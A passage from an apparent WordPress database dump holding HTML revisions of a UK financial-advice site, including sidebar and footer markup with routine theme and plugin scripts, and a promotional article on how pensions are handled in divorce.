href=\"#tab-recent\">Recent</a></li>\n<p>&#13;\n														</ul>\n<div class=\"tab-box tabs-container\"><p>&#13;\n										</p>\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\n												</p>\n<ul class=\"news-list\">\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										October 12th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/best-annuity-rates\">&#13;\n										<img width=\"52\" height=\"43\" src=\"/wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/best-annuity-rates\">What Are The Best Annuity Rates in The UK</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										March 21st, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 10th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 18th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 5th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n													</ul>\n</div>\n<p>&#13;\n															</p>\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\n												</p>\n<ul class=\"news-list\">\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 10th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/5-facts-know-annuities\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 9th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 6th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 6th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/staging-date-social-advisors\">When is your Staging Date Social Advisors</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 6th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n													</ul>\n</div>\n<p>&#13;\n														</div>\n<p>&#13;\n			</div>\n<p>&#13;\n		</div>\n<p>&#13;\n		</div>\n<div id=\"categories-3\" class=\"widget widget_categories\">\n<div class=\"heading\">\n<p>Post Categories</p>\n</div>\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\n		}\n	}\n	dropdown.onchange = onCatChange;\n/* ]]]]><![CDATA[> */\n]]></script></a></div>\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\n<div class=\"heading\">\n\nGet Social\n\n</div>\n<ul class=\"social-networks clearfix\">\n<ul class=\"social-networks clearfix\">\n 	<li class=\"rss\">\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nRSS\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks clearfix\">\n<ul class=\"social-networks clearfix\">\n 	<li class=\"twitter\">\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTwitter\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n<div id=\"text-23\" class=\"widget widget_text\">\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"/WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"/leadbox-690.js\"/></div>\n<p>&#13;\n		</div>\n</div>\n<p>&#13;\n		</div>\n<p>&#13;\n	</div>\n<p>&#13;\n				</p>\n<footer class=\"footer-area\">\n<div class=\"avada-row\"><p>&#13;\n			</p>\n<section class=\"columns columns-3\">\n<article class=\"col\">\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\n<p>Our Latest Posts</p>\n<ul>\n<li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n						</li>\n<p>&#13;\n				</ul>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col\">\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\n<p>Contact Info</p>\n<div class=\"contact-info-container\"><p>&#13;\n				</p>\n<p class=\"address\">Manchester &amp; London</p>\n<p>&#13;\n		&#13;\n				</p>\n<p class=\"phone\">Phone: </p>\n<p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				</p>\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\n<p>&#13;\n		&#13;\n				&#13;\n				</div>\n<p>&#13;\n		</p>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col\">\n<div id=\"text-22\" class=\"footer-widget-col widget_text\">\n<p>Download Your FREE Retirement Guides</p>\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>\n<p>&#13;\n		</p>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col last\"/></section>\n</div>\n<p>&#13;\n	</footer>\n<footer id=\"footer\"/></div>\n<p><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\n/* ]]]]><![CDATA[> */\n]]></script><script src=\"/wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\n</body></p>\n// ]]></script></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>','A Guide To Auto Enrolment','','inherit','closed','closed','','70-autosave-v1','','','2017-09-21 17:20:04','2017-09-21 17:20:04','',70,'http://www.equalitywalk.org.uk/70-autosave-v1',0,'revision','',0),(316,1,'2017-09-21 17:21:29','2017-09-21 17:21:29','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\">\r\n<div id=\"sidebar\" style=\"float: right;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><script src=\"/wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n</body></p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','A Guide To Auto Enrolment','','inherit','closed','closed','','70-revision-v1','','','2017-09-21 17:21:29','2017-09-21 17:21:29','',70,'http://www.equalitywalk.org.uk/70-revision-v1',0,'revision','',0),(317,1,'2018-12-19 10:02:26','2018-12-19 10:02:26','&nbsp;\n\n<b>“Til Divorce Do Us Part”</b>\n\nIn February last year the Office for National Statistics released some depressing figures: The ONS estimates that 42% of marriages now end in divorce  34% of marriages are expected to end in divorce by the 20th wedding anniversary.\n\nThe greatest chance of divorce is between the 4th and 8th wedding anniversaries. In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814. See stats here.\n\nThe Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case. It is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\n\n<strong>No-one gets married with the intention of splitting up</strong> – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are <em>no children involved then it can be a simple process</em>. If that’s the case with you, <a href=\"https://www.theguardian.com/lifeandstyle/2016/aug/23/divorce-new-rules-splitting-up-amicable-marriage-breakup\" target=\"_blank\">this website could be useful</a>.\n\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – <em>and the more there will be a need for financial planning advice.</em>\n<h2>Can Pensions Be Affected?</h2>\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\n\n<strong>The value of a pension</strong> – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\n\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\n\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy. <em>Getting divorced can be the saddest and frustrating part of your life. <a href=\"http://www.mentalhealthamerica.net/separation-and-divorce\" target=\"_blank\">See coping advice</a>.\n</em>\n\nNo one ever gets married and has the expectation to later on get divorced, so of course it is a time where both will go <strong>through a long process of frustration</strong>.\n\nSigning papers and documents can be time consuming and so are the other problems that come with it, such as <strong>child custody and finance settlements</strong>. You will find these times to be very critical and having lawyers that know what they are doing can be a <em>great help as they are able to provide guidance</em>. If you are experiencing these difficulties, we recommend using <a href=\"https://emfl.com.au/property-settlements/\" target=\"_blank\">Emerson Family Law to handle your property settlements</a> and other assets.\n<h2>Understanding  your rights</h2>\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\n\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\n\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. <em>You’ve enough to worry about, without worrying about money.</em>\n\n<strong>If you feel that you may be heading towards a divorce</strong> – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\n<p class=\"form-submit\"><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\n\n<div id=\"sidebar\" style=\"display: none;\">\n<div id=\"text-24\" class=\"widget widget_text\">\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n		</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"heading\">\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>New Guides</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n&#13;\n		</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div 